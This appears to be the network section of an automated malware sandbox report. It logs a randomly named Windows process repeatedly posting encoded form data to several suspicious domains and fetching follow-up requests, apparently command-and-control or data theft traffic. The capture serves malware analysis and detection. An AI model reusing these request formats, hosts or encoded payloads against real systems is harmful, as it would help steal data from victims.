                                                                              Data Ascii: 6NVpdLF=Fw8woR6UyQnFDxd1bulT4k7DVOIfae5jPHzMwrn9HDGCVBu+D5bpLBstQqWhB3ylhFNx/Ibk/UD98GsdRmOvpJPXT+FRp5itm7wvOFyF+K+3GjZ20LnehvMjU3/xDkPCXpWMOl0Au9IQEwatdQyGetR0N6ncdFJeYT0pTC0UskWUFm775t21LUGFW091
Dec 2, 2024 14:43:54.896246910 CET | 391 | IN | HTTP/1.1 301 Moved Permanently
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Mon, 02 Dec 2024 13:43:54 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 178
                                                                              Connection: close
                                                                              Location: https://www.cstrategy.online/qx5d/
                                                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.10 | 49866 | 194.76.119.60 | 80 | 6680 | C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe
Timestamp | Bytes transferred | Direction | Data
Dec 2, 2024 14:43:56.163120985 CET | 652 | OUT | POST /qx5d/ HTTP/1.1
                                                                              Host: www.cstrategy.online
                                                                              Accept: */*
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-us
                                                                              Origin: http://www.cstrategy.online
                                                                              Content-Length: 220
                                                                              Connection: close
                                                                              Cache-Control: no-cache
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Referer: http://www.cstrategy.online/qx5d/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                              Data Ascii: 6NVpdLF=Fw8woR6UyQnFDQt1dJxT/E7ML+IfPu5ZPHPMwqzXH22CQQe+E4bpIBstfKWkcHzIhFR5/J3k/UX98DIdRRysoZPVaeFTnZitm7wvOBav+OS3FTp20qndoPMgdX/xJEP4XpWyOkpdu/AQEwqtdhyHVtRyHanITk4ACSQ1bDY5tWWULnG8o8XiYjaLYyIfj5okDfMqq5iW/giDImx+rg==
Dec 2, 2024 14:43:57.561367035 CET | 391 | IN | HTTP/1.1 301 Moved Permanently
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Mon, 02 Dec 2024 13:43:57 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 178
                                                                              Connection: close
                                                                              Location: https://www.cstrategy.online/qx5d/
                                                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.10 | 49872 | 194.76.119.60 | 80 | 6680 | C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe
Timestamp | Bytes transferred | Direction | Data
Dec 2, 2024 14:43:58.833781004 CET | 1665 | OUT | POST /qx5d/ HTTP/1.1
                                                                              Host: www.cstrategy.online
                                                                              Accept: */*
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-us
                                                                              Origin: http://www.cstrategy.online
                                                                              Content-Length: 1232
                                                                              Connection: close
                                                                              Cache-Control: no-cache
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Referer: http://www.cstrategy.online/qx5d/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
Data Ascii: 6NVpdLF= [TRUNCATED]
Dec 2, 2024 14:44:00.196142912 CET | 391 | IN | HTTP/1.1 301 Moved Permanently
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Mon, 02 Dec 2024 13:43:59 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 178
                                                                              Connection: close
                                                                              Location: https://www.cstrategy.online/qx5d/
                                                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.10 | 49879 | 194.76.119.60 | 80 | 6680 | C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe
Timestamp | Bytes transferred | Direction | Data
Dec 2, 2024 14:44:01.490506887 CET | 359 | OUT | GET /qx5d/?6NVpdLF=IyUQrkKyuirfHSYtNcNb8FX1VMdObdd7C0LSkI7uCAGWAT/RC+PuW1l2SNatEGXPklxe1J/nxX2px2UyQ1iPppPRQa5ZmY++m+47QgCR+/iVNw4gjA==&_jVx=rlV0_TQ81 HTTP/1.1
                                                                              Host: www.cstrategy.online
                                                                              Accept: */*
                                                                              Accept-Language: en-us
                                                                              Connection: close
                                                                              User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
Dec 2, 2024 14:44:02.857950926 CET | 531 | IN | HTTP/1.1 301 Moved Permanently
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Mon, 02 Dec 2024 13:44:02 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 178
                                                                              Connection: close
                                                                              Location: https://www.cstrategy.online/qx5d/?6NVpdLF=IyUQrkKyuirfHSYtNcNb8FX1VMdObdd7C0LSkI7uCAGWAT/RC+PuW1l2SNatEGXPklxe1J/nxX2px2UyQ1iPppPRQa5ZmY++m+47QgCR+/iVNw4gjA==&_jVx=rlV0_TQ81
                                                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              5 | 192.168.2.10 | 49896 | 103.224.182.242 | 80 | 6680 | C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Dec 2, 2024 14:44:09.216964006 CET | 610 | OUT | POST /6ou6/ HTTP/1.1
                                                                              Host: www.madhf.tech
                                                                              Accept: */*
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-us
                                                                              Origin: http://www.madhf.tech
                                                                              Content-Length: 196
                                                                              Connection: close
                                                                              Cache-Control: no-cache
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Referer: http://www.madhf.tech/6ou6/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                              Data Ascii: 6NVpdLF=bcTWnB08V6+cMyAChHoCete2afKVv/HJBIK1741gegLH/ov8yq9/IgPEX223NS04PXPTK64e0Fq/6xUxWdTB9W7j/NFl2Mhd5IphPEb7Q76/KsskEWAKUOxJLPdgugDwtDNbSnqCm1e6C99JfxmuELLmZoyNndgFSgsN7haDDGZsmyBIPlGIF2p6E4d4
                                                                              Dec 2, 2024 14:44:10.494709015 CET | 871 | IN | HTTP/1.1 200 OK
                                                                              date: Mon, 02 Dec 2024 13:44:10 GMT
                                                                              server: Apache
                                                                              set-cookie: __tad=1733147050.6544345; expires=Thu, 30-Nov-2034 13:44:10 GMT; Max-Age=315360000
                                                                              vary: Accept-Encoding
                                                                              content-encoding: gzip
                                                                              content-length: 576
                                                                              content-type: text/html; charset=UTF-8
                                                                              connection: close


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              6 | 192.168.2.10 | 49902 | 103.224.182.242 | 80 | 6680 | C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Dec 2, 2024 14:44:11.880659103 CET | 634 | OUT | POST /6ou6/ HTTP/1.1
                                                                              Host: www.madhf.tech
                                                                              Accept: */*
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-us
                                                                              Origin: http://www.madhf.tech
                                                                              Content-Length: 220
                                                                              Connection: close
                                                                              Cache-Control: no-cache
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Referer: http://www.madhf.tech/6ou6/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                              Data Ascii: 6NVpdLF=bcTWnB08V6+cOWECtA8CWtexZfKVkfHVBJ2175w7eVjH66381uJ/NgPEcW2IDy0vPXDxK5ge0EK/6zMxRurC9G7h3tFj7shd5IphPAzRQ7i/LfkkLSULL+xIIPdglAD0tDM2Sizfm3W6C4RJfjCtOLLkGYzjvtJpUyg/iROwf2MPoz8Pe0nfWB10K+oS6bd7kFq6SciEPe9/O6ki6g==
                                                                              Dec 2, 2024 14:44:13.149802923 CET | 871 | IN | HTTP/1.1 200 OK
                                                                              date: Mon, 02 Dec 2024 13:44:12 GMT
                                                                              server: Apache
                                                                              set-cookie: __tad=1733147052.6846258; expires=Thu, 30-Nov-2034 13:44:12 GMT; Max-Age=315360000
                                                                              vary: Accept-Encoding
                                                                              content-encoding: gzip
                                                                              content-length: 576
                                                                              content-type: text/html; charset=UTF-8
                                                                              connection: close


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              7 | 192.168.2.10 | 49909 | 103.224.182.242 | 80 | 6680 | C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Dec 2, 2024 14:44:14.536616087 CET | 1647 | OUT | POST /6ou6/ HTTP/1.1
                                                                              Host: www.madhf.tech
                                                                              Accept: */*
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-us
                                                                              Origin: http://www.madhf.tech
                                                                              Content-Length: 1232
                                                                              Connection: close
                                                                              Cache-Control: no-cache
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Referer: http://www.madhf.tech/6ou6/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                              Dec 2, 2024 14:44:15.869857073 CET | 871 | IN | HTTP/1.1 200 OK
                                                                              date: Mon, 02 Dec 2024 13:44:15 GMT
                                                                              server: Apache
                                                                              set-cookie: __tad=1733147055.5887323; expires=Thu, 30-Nov-2034 13:44:15 GMT; Max-Age=315360000
                                                                              vary: Accept-Encoding
                                                                              content-encoding: gzip
                                                                              content-length: 576
                                                                              content-type: text/html; charset=UTF-8
                                                                              connection: close


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              8 | 192.168.2.10 | 49916 | 103.224.182.242 | 80 | 6680 | C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Dec 2, 2024 14:44:17.193768024 CET | 353 | OUT | GET /6ou6/?_jVx=rlV0_TQ81&6NVpdLF=We72k2U8RqyHNx9c0lgrcMajP+7PydPnCau05KQMUjWmq73IzupFdRGddnmXCSRdMUrkGKdQ0AHY8jBIUc/t/Wjx9MdL3/Nu9eMgeVL6PZ2CHNoDSQ== HTTP/1.1
                                                                              Host: www.madhf.tech
                                                                              Accept: */*
                                                                              Accept-Language: en-us
                                                                              Connection: close
                                                                              User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                              Dec 2, 2024 14:44:18.467788935 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                              date: Mon, 02 Dec 2024 13:44:18 GMT
                                                                              server: Apache
                                                                              set-cookie: __tad=1733147058.6768786; expires=Thu, 30-Nov-2034 13:44:18 GMT; Max-Age=315360000
                                                                              vary: Accept-Encoding
                                                                              content-length: 1472
                                                                              content-type: text/html; charset=UTF-8
                                                                              connection: close
                                                                              Data Ascii: <html><head><title>madhf.tech</title><script type="text/javascript" src="/js/fingerprint/iife.min.js"></script><script type="text/javascript">var redirect_link = 'http://www.madhf.tech/6ou6/?_jVx=rlV0_TQ81&6NVpdLF=We72k2U8RqyHNx9c0lgrcMajP+7PydPnCau05KQMUjWmq73IzupFdRGddnmXCSRdMUrkGKdQ0AHY8jBIUc/t/Wjx9MdL3/Nu9eMgeVL6PZ2CHNoDSQ==&';// Set a timeout of 300 microseconds to execute a redirect if the fingerprint promise fails for some reasonfunction fallbackRedirect() {window.location.replace(redirect_link+'fp=-7');}try {const rdrTimeout = setTimeout(fallbackRedirect, 300);var fpPromise = FingerprintJS.load({monitoring: false});fpPromise.then(fp => fp.get()).then(result => { var fprt = 'fp='+result.visitorId;clearTimeout(rdrTimeout);window.location.replace(redirect_link+fprt);});} catch(err) {fallbackRedirect();}</script><style> body { background:#101c36 } </style></head><body bgcolor="#ffffff" text=
                                                                              Dec 2, 2024 14:44:18.467842102 CET | 508 | IN
                                                                              Data Ascii: "#000000"><div style='display: none;'><a href='http://www.madhf.tech/6ou6/?_jVx=rlV0_TQ81&6NVpdLF=We72k2U8RqyHNx9c0lgrcMajP+7PydPnCau05KQMUjWmq73IzupFdRGddnmXCSRdMUrkGKdQ0AHY8jBIUc/t/Wjx9MdL3/Nu9eMgeVL6PZ2CHNoDSQ==&fp=-3'>Click here to enter<


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              9 | 192.168.2.10 | 49932 | 172.67.158.106 | 80 | 6680 | C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Dec 2, 2024 14:44:24.162108898 CET | 622 | OUT | POST /v89f/ HTTP/1.1
                                                                              Host: www.bser101pp.buzz
                                                                              Accept: */*
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-us
                                                                              Origin: http://www.bser101pp.buzz
                                                                              Content-Length: 196
                                                                              Connection: close
                                                                              Cache-Control: no-cache
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Referer: http://www.bser101pp.buzz/v89f/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                              Data Ascii: 6NVpdLF=iTfEV/Gi0JnQQaER7Xj8i31gQDajEzkh8SHhYEYh/cfQ3Aw744xH6jezg7Ccuw02qR4gT3RNmWUsW7QUx1ZE2Yo5hh3GT3TuUX6gG5fE9qmYHztE4V+dH4ofZqiZg6nzoD/uCqzOP6Q7bBFdukhUK+dWLxV29XPp0XUuoPrTyBysSciUWxCUJNM8GZ6b
                                                                              Dec 2, 2024 14:44:25.368513107 CET | 974 | IN | HTTP/1.1 404 Not Found
                                                                              Date: Mon, 02 Dec 2024 13:44:25 GMT
                                                                              Content-Type: text/html
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              CF-Cache-Status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hNOKCjlPdwE%2FWPwY%2Fb38CilvJz6z9stpCoCA1NitIsgqppTexqMbRrA7UXSzMTmmfhAQvUnz10vk8K9akxmIR5tvE4s4Swawkcw2dMR%2BaArDznJlI6pMsMMl4bDghQxnFBMFBUs%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8ebbc064eec2f793-EWR
                                                                              Content-Encoding: gzip
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1477&min_rtt=1477&rtt_var=738&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=622&delivery_rate=0&cwnd=125&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              10 | 192.168.2.10 | 49939 | 172.67.158.106 | 80 | 6680 | C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Dec 2, 2024 14:44:26.817049026 CET | 646 | OUT | POST /v89f/ HTTP/1.1
                                                                              Host: www.bser101pp.buzz
                                                                              Accept: */*
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-us
                                                                              Origin: http://www.bser101pp.buzz
                                                                              Content-Length: 220
                                                                              Connection: close
                                                                              Cache-Control: no-cache
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Referer: http://www.bser101pp.buzz/v89f/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                              Data Ascii: 6NVpdLF=iTfEV/Gi0JnQW5sR52j8lX1jfjajOTkl8SDhYFcx+uLQ0hA7i5xH2Dez4LDWwA09qR0STzRNmWAsW5YUwCNH2Io7tB3AOnTuUX6gG5Lu9uKYHDdEqgCccYoceqiZ3qn3oD/ICrvgP5o7bA1duQVLfOdcPxUl+lGS2FMAhODwg3mOcdfTHgjDa6QyIfPxKRYRjO2VqkeKbqFSxxv2YQ==
                                                                              Dec 2, 2024 14:44:27.994410992 CET | 972 | IN | HTTP/1.1 404 Not Found
                                                                              Date: Mon, 02 Dec 2024 13:44:27 GMT
                                                                              Content-Type: text/html
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              CF-Cache-Status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ANfFGu7HhnZumRkzORjZnS9TSgw1HNt3h4WprfQ5EsPByNfdrGQfQ2Q2z5v%2FCfIqamuxFz4N1amkiLIWLMi6Y09gQ%2BNqyA8DwSoIBwVZiF7Kru9SMFocUs9lwwvMYbFf64IH6B4%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8ebbc0755d2141c3-EWR
                                                                              Content-Encoding: gzip
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2205&min_rtt=2205&rtt_var=1102&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=646&delivery_rate=0&cwnd=70&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              11 | 192.168.2.10 | 49945 | 172.67.158.106 | 80 | 6680 | C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Dec 2, 2024 14:44:29.473859072 CET | 1659 | OUT | POST /v89f/ HTTP/1.1
                                                                              Host: www.bser101pp.buzz
                                                                              Accept: */*
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-us
                                                                              Origin: http://www.bser101pp.buzz
                                                                              Content-Length: 1232
                                                                              Connection: close
                                                                              Cache-Control: no-cache
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Referer: http://www.bser101pp.buzz/v89f/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                              Dec 2, 2024 14:44:30.642689943 CET | 976 | IN | HTTP/1.1 404 Not Found
                                                                              Date: Mon, 02 Dec 2024 13:44:30 GMT
                                                                              Content-Type: text/html
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              CF-Cache-Status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eH7Ad%2BIWLbwnMZL8Ric5%2FivIRXo0jPbWyv5DHW2vUH9PqS8ZIy8Z7jQXngurnukTBxJ%2BMEXKom2p0c6aavxnIFXdPgCho4c1AZibPftZ7pZuEIWCI1ruKNM7V7rNSbosZToRDFM%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8ebbc085e8a38c4d-EWR
                                                                              Content-Encoding: gzip
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2023&min_rtt=2023&rtt_var=1011&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1659&delivery_rate=0&cwnd=156&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              12 | 192.168.2.10 | 49952 | 172.67.158.106 | 80 | 6680 | C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Dec 2, 2024 14:44:32.132716894 CET | 357 | OUT | GET /v89f/?6NVpdLF=vR3kWP+v98PFeIQX6HbJh3lQDWTjSRYryWjHUGMo4+T5xi8TnNV+jgD2+4ag3QdSrCwOZVBfu0hve5I79B9kwLEpkgrXXmS6Zwq+X4n7/LWdMx9Q7w==&_jVx=rlV0_TQ81 HTTP/1.1
                                                                              Host: www.bser101pp.buzz
                                                                              Accept: */*
                                                                              Accept-Language: en-us
                                                                              Connection: close
                                                                              User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                              Dec 2, 2024 14:44:33.346755981 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                              Date: Mon, 02 Dec 2024 13:44:33 GMT
                                                                              Content-Type: text/html
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              CF-Cache-Status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Tn7aZzDRaom%2B5MRerP01lE%2FLZ7ggAbDVK7SDbJsz7rXguARlrgm%2BiuAkrrzCVi4JBhH6MjmQ0U%2F%2Bf9w7T0A9v5e6Tp2wmBfI924Dmscd7K4IntEV795bJhCHfogLqJp2%2BfbEeL0%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8ebbc096df771895-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1483&min_rtt=1483&rtt_var=741&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=357&delivery_rate=0&cwnd=183&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                              Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chro
                                                                              Dec 2, 2024 14:44:33.346962929 CET | 102 | IN
                                                                              Data Ascii: me friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              13 | 192.168.2.10 | 49967 | 3.33.130.190 | 80 | 6680 | C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Dec 2, 2024 14:44:39.001931906 CET | 643 | OUT | POST /8m07/ HTTP/1.1
                                                                              Host: www.goldstarfootwear.shop
                                                                              Accept: */*
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-us
                                                                              Origin: http://www.goldstarfootwear.shop
                                                                              Content-Length: 196
                                                                              Connection: close
                                                                              Cache-Control: no-cache
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Referer: http://www.goldstarfootwear.shop/8m07/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                              Data Ascii: 6NVpdLF=7fvor6a+xd+5pjFNxDPsvq/Ttn/vqXRdrk3RPKNIXslDoplgZs6UYD5jl1Z1QPc+zwZM874ARwvwtMMHTr/aQIPm8bVlZ11NE+3MC3QMzDfkEZeWDwu6bT6L5I0N6jlfhUhobCt2xg2gOyXlVtGobRHM0OLylQA/iOVwL76fTumlPgmm4K5JJUuSytm4


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              14 | 192.168.2.10 | 49974 | 3.33.130.190 | 80 | 6680 | C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Dec 2, 2024 14:44:41.690571070 CET | 667 | OUT | POST /8m07/ HTTP/1.1
                                                                              Host: www.goldstarfootwear.shop
                                                                              Accept: */*
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-us
                                                                              Origin: http://www.goldstarfootwear.shop
                                                                              Content-Length: 220
                                                                              Connection: close
                                                                              Cache-Control: no-cache
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Referer: http://www.goldstarfootwear.shop/8m07/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                              Data Ascii: 6NVpdLF=7fvor6a+xd+5vDVNzk7s76/cxX/vj3RBrk7RPOUTXeRDoIVgfd6UIT5jtVZwUPcDzwdy86EARwrwtN8HT4HVQYPk07VnWV1NE+3MC3FpzDHkEpuWCVO5Wz6KoI0NpzlThUgNbDwjxm6gOznlMcGrVhHC3+KduFhokPEXUoqrB4GaIBbhpbYeajyc8rTS2wh8HIJIeg9QMEqYOAsEOg==


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              15 | 192.168.2.10 | 49981 | 3.33.130.190 | 80 | 6680 | C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Dec 2, 2024 14:44:44.355114937 CET | 1680 | OUT | POST /8m07/ HTTP/1.1
                                                                              Host: www.goldstarfootwear.shop
                                                                              Accept: */*
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-us
                                                                              Origin: http://www.goldstarfootwear.shop
                                                                              Content-Length: 1232
                                                                              Connection: close
                                                                              Cache-Control: no-cache
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Referer: http://www.goldstarfootwear.shop/8m07/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              16 | 192.168.2.10 | 49988 | 3.33.130.190 | 80 | 6680 | C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Dec 2, 2024 14:44:47.015214920 CET | 364 | OUT | GET /8m07/?6NVpdLF=2dHIoPS/8uSmn0UQwBXvkZ7FsiKx9Udv3lXpG+Z7ZfR3/r1MA6yfaSEuuX1gcPtu0HplxKUHBw+SrOQKMJrrWZvRz659dWh9F4TBV1031x6bEqu3dQ==&_jVx=rlV0_TQ81 HTTP/1.1
                                                                              Host: www.goldstarfootwear.shop
                                                                              Accept: */*
                                                                              Accept-Language: en-us
                                                                              Connection: close
                                                                              User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                              Dec 2, 2024 14:44:48.194793940 CET | 394 | IN | HTTP/1.1 200 OK
                                                                              Server: openresty
                                                                              Date: Mon, 02 Dec 2024 13:44:48 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 254
                                                                              Connection: close
